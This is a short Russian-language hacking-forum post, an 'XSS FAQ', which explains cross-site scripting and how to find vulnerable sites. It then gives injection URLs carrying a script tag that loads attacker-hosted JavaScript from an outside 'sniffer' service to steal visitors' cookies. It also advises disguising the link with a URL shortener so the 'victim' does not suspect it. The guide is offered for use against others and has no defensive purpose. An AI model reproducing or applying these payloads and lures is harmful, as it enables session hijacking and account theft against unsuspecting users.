|
Xss - faq
Привет всем я хотел сделать небольшой FAQ по xss ну что начнем
1.Что такое XSS ? Code:
XSS - Cross Ste Scripting (CSS уже занято Cascade Style Sheets). Уязвимость, возникающая вследствии недостаточной фильтрации вводимых пользователями и в дальнейшем отображаемых на страницах сайта данных. Позволяет разместить непосредственно на страницах сайта произвольный html-код (соответственно, код будет выполняться у всех пользователей, зашедших на страницу).В поиске напишите <fuck> и в исходники поищите слово fuck если "<>" остались это значит то что сайт уязвим если они заменились на что то типа такого : Code:
<fuck>Code:
<script>alert()</script> 3.Эксплуатирование XSS : Эксплуатировать xss вы можете с любого сниффера например https://hacker-pro.net/sniffer/ заходим на сниффер нам нужно будет взять оттуда скрипт для кражи cookies Взяли скрипт ? он может выглядит вот так : Code:
%3CSCRIPT type=text/javascript src=http://httpz.ru/juxfbp99bcgo.js></SCRIPT>"например у нас получилась такая ссылка Code:
http://site.ru/news="><script>alert('xss')</script>Code:
http://site.ru/news=">%3CSCRIPT type=text/javascript src=http://httpz.ru/juxfbp99bcgo.js></SCRIPT>"4.Шифрование длинных ссылок : Согласитесь если такую ссылку дать жертве то она заподозрит что тo и мы должны сделать её короткой мы можем зашифровать её с помощью сервиса http://tinyurl.com/ и отправлять жертве и если она перейдет по ссылке то на наш сниффер придут её куки конечно же если сайт оставляет куки) ну что на всё. (c) TICKHACK |
| All times are GMT. The time now is 10:31 AM. |
Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2024, vBulletin Solutions, Inc.
vB.Sponsors